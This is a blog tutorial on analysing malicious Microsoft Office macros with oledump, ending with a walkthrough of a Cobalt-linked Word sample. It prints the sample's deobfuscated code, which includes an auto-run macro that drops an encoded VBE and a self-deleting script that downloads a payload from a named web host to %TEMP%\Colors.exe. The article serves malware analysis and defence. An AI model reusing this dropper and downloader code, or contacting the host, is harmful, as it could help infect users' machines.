Malicious Microsoft Office Document Analysis and Analyze a Cobalt Sample

Tho Le
7 min readOct 12, 2019

The article aims to share some insights into analyzing malicious Microsoft Office files. It contains 3 parts as below:

  • Microsoft Office Document Analysis: provides an overview of Office file formats and tools to analyze.
  • Macro (VBA — Visual Basic for Application) Analysis: presents some tips to analyze and debug Macros.
  • Analyze a Cobalt sample: applies knowledge shared above to deal with a real sample.

Microsoft Office Document Analysis

Prior to Microsoft Office 2007, Microsoft Office files are under a legacy format, namely OLE2, which is a compound file technology (for example, *.doc, *.xls and *.ppt).

Starting from Office 2007, Microsoft uses the XML-based file formats (for example, *.docx, *.xlsx and *.pptx) which is simply just a zip file. By decompression, all plaintext parts are viewable. For backward compatibility, Microsoft also supports OLE2 (*.bin) which can be found in the decompressed files.

For malware analysis, OLE2 is the target of interest as Macro (a common approach to delivery malicious codes) can be embedded inside that binary file structure. However, it's internal structure is quite complex. Fortunately, analysts don’t have to know OLE2’s structure as there are multiple tools available to parse and analyze OLE2.

This article doesn’t aim to list all available tools. Instead, it just states the author’s preference. In that sense, “oledump.py”, by Didier Steven, is introduced since it provides two main benefits: (1) parse/present all contents inside OLE2. This is important because Macro can be in SRP streams (a cached version of earlier Macro code) or in VBA streams as p-code which can be ignored by some automatic tools such olevba. (2) extract Macro from OLE2. For more information, Lenny Zeltser’s cheat sheet and Didier’s blog are good references.

The examination of an OLE2 file starts with the command

oledump.py <filename>

The figure below illustrates the output. In short, the first column represents a stream number and the letter “M” or “m” indicate Macro. Hence, further investigation is required for stream 7.

Figure 1: Oledump Output

Analysts can select an interesting stream and extract Macro with the command below with output as in Figure 2.

oledump.py <filename> -s <stream number> -v

Figure 2: Oledump extracts Macro from the stream 7

Tips for Macro (VBA) Analysis

Now, the suspicious Macro is extracted and ready for analysis. Macro or VBA (Visual Basic for Application) is VB script with some extra functions tied to Microsoft Office (e.g. Word, Excel, Powerpoint etc.). Therefore, parts of VBA can be run as a normal VB script with Wscript.exe and Cscript.exe. Tutorialspoint provides a good cover for VBA to start with.

Below are some tips to analyze VBA codes:

  • Event identification: VBA is an event-driven programming language; hence, it is important to examine an event that leads to code execution (e.g. button clicked, file opened and mouseover, etc.). Notably, AutoOpen (for word) and WorkBook_Open (for Excel) will be executed, when a file is opened and Macro is enabled.
Figure 3: VBA Event Identification
  • Comment removal: Malware writers try to overwhelm analysts by adding numerous comments into VBA codes (comments are preceded by character). Those comments are not part of the codes; hence, they can be safely ignored/removed.
  • String replacement: it is common that malware writers play around with string to confuse analysts such as :
    Set sr = CreateObject(Replace(“EOWSEOWchEOWeEOWduEOWleEOW.sEOWeEOWrvEOWiEOWceEOW”, “EOW”, “”)) → create a Schedule.service object.
  • Variable/function rename: Malware writers enjoy to spin your head around with crazy variable/function names, such as jcoknrvrjwvktuyoedov. Hence, it is really helpful to rename variable/function names to somethings that reflect their functions such as jcoknrvrjwvktuyoedov → new_file.
  • Execute VB script codes: if there is a chunk of VB script codes (remember VBA is just VB script tied to Microsoft Office with some extra functionalities) that are highly obfuscated and will take a lot of time for analysis. A quick way to overcome is to copy those codes to a new file and use either Wscript.exe or Cscript.exe to run it.
  • Debugging: Some of the codes are difficult to get its execution return as it uses app-related calls (as said, VBA is tied with Microsoft Office. It is just the same for PDF analysis as you face with some Adobe calls). By opening a malicious file in a native application (e.g. Word, Excel and Powerpoint), those codes can be debugged and execution return can be examined easily. In order to debug a Microsoft document, refer to this instruction. OpenOffice can be used instead, however, not all calls are available.

Analyze a Cobalt sample

It is time to get our hands dirty. Let's examine a malicious document file that is just found yesterday (2019–10–11 09:59:07 UTC) by the Threat Intelligence community. The file can be found at:

VT URL: https://www.virustotal.com/gui/file/9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca/detection

The article doesn’t aim provide a full analysis of this file (I like to keep the funniest part for readers :), also because it is quite simple). Instead, the article provides a key-step analysis as presented in the tips above.

Starting with oledump to examine all streams inside the Word file. As seen in Figure 4, stream 8 and 9 warrant further investigation as they contain Macro.

Figure 4: Examine a Cobalt malicious Word file

Extracting Macro from those streams and save to two files s8.vbs and s9.vbs with commands below:

oledump.py 9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca -s 8 -v > s8.vbs

oledump.py 9f7dbeea18f8525bf94d3d877ca433545915f06483b597d84beb2a3cd30589ca -s 9 -v > s9.vbs

Examination of s8.vbs

s8.vbs contains a lot of comments as seen in Figure 5.

Figure 5: s8.vbs examination

Those comments can easily be removed to show the real interesting codes (applying comment removal tips).

Public Function LtCvdeO()
CWAwmvwl = Replace(“UGETUGEEUGEMUGEP”, “UGE”, “”)
tuDCxOiw = Environ(CWAwmvwl) & Replace(“\ePIFLrrPIFLorPIFL_loPIFLg.PIFLvPIFLbPIFLe”, “PIFL”, “”)
LtCvdeO = tuDCxOiw
End Function

Here, we see the sign of string manipulation with “Replace” function which can be easily converted back to its original texts (applying string replacement tip).

Replace(“UGETUGEEUGEMUGEP”, “UGE”, “”) → “TEMP”

Replace(“\ePIFLrrPIFLorPIFL_loPIFLg.PIFLvPIFLbPIFLe”, “PIFL”, “”) → “\error_log.vbe”

So the function LtCvdeO is to return the file path for a VBE (VB Encoded). Let's rename it from LtCvdeO to VBE_Drop_Path and use find/replace function in your text editor to populate this rename in both s8.vbs and s9.vbs (applying Variable/function rename tip).

Examination of s9.vbs

The script starts with the following codes which open a file with the path return by Module1.VBE_Drop_Path ( “TEMP\error_log.vbe”). Hence, it is clear that this malicious Word file will drop a VBE file as its second stage.

Sub Document_Open()
On Error Resume Next

Open Module1.VBE_Drop_Path For Output As #1

Followed by highly obfuscated codes as below:

bsEZIkCU = bsEZIkCU & Chr((-869 + 1027) / 2) & Chr((-890 + 1006) / 2) & Chr((-841 + 1055) / 2) & Chr((-890 + 1006) / 2) & Chr((-838 + 1058) / 2) & Chr((-884 + 1012) / 2) & Chr((-913 + 983) / 2) & Chr((-884 + 1012) / 2) & Chr((-910 + 986) / 2) & Chr((-905 + 991) / 2) & Chr((-863 + 1033) / 2) & Chr((-870 + 1026) / 2) & Chr((-904 + 992) / 2) & Chr((-861 + 1035) / 2) & Chr((-915 + 981) / 2) & Chr((-828 + 1068) / 2) & Chr((-854 + 1042) / 2) & Chr((-880 + 1016) / 2) & Chr((-841 + 1055) / 2) & Chr((-873 + 1023) / 2)

bsEZIkCU = bsEZIkCU & Chr((-828 + 1068) / 2) & Chr((-895 + 1001) / 2) & Chr((-864 + 1032) / 2) & Chr((-837 + 1059) / 2) & Chr((-881 + 1015) / 2) & Chr((-883 + 1013) / 2) & Chr((-883 + 1013) / 2) & Chr((-887 + 1009) / 2) & Chr((-887 + 1009) / 2) & Chr((-854 + 1042) / 2) & Chr((-913 + 983) / 2) & Chr((-822 + 1074) / 2) & Chr((-884 + 1012) / 2)
Print #1, bsEZIkCU → bsEZIkCU contains the second stage code to drop to error_log.vbe file

Close #1
Call ucRooOBbx
End Sub

To find the real content of “bsEZIkCU”, there are three main ways: (1) do it manually which will be time-consumption and error-prone(2) apply the “Execute VB script codes” tip which is fast and far easier than the former approach. The article also applies this way to derive the second stage file, namely error_log.vbe (3) apply the “debugging” tip, however, the macro is password protected. Hence, it can’t be used.

Figure 6: Screenshot of error_log.vbe

Codes in ucRooOBbx() and DPoxlCnR(t) are to setup a schedule task. However, it is left for readers to complete the story.

Examination of error_log.vbe

error_log.vbe is an encoded VB script which can be easily decoded by Decoding VBE by Didier Stevens.

After decoding, the real code is revealed as below:

On Error Resume Next
set o=CreateObject(“wscript.shell”)
Set le = CreateObject(replace(“CHIARScCHIARrCHIARiCHIARptCHIARingCHIAR.CHIARFilCHIAReSCHIARysCHIARteCHIARmCHIARObCHIARjecCHIARtCHIAR”, “CHIAR”, “”)) ‘Scripting.FileSystemObject
Call le.DeleteFile(WScript.ScriptFullName, True)
t=o.ExpandEnvironmentStrings(“%TEMP%”) & “\Colors.exe”
set ms=createobject(“MSXML2.ServerXMLHTTP.6.0”)
set ad=createobject(“Adodb.Stream”)
ms.Open “GET”, “https://www.octetfruitsllc.com/vendor/phpunit/phpunit/src/Util/PHP/avatar.hlpv", False ‘Download file to %TEMP%\Colors.exe

As can be seen, the code will download a second-stage code from octetfruitsllc[.]com and stored under %TEMP\Colors.exe.

The analysis stops here as it has demonstrated all necessary steps to analyze the Cobalt malicious Word document.

--

--

Tho Le

Senior Cyber Security Analyst — be better than the yesterday self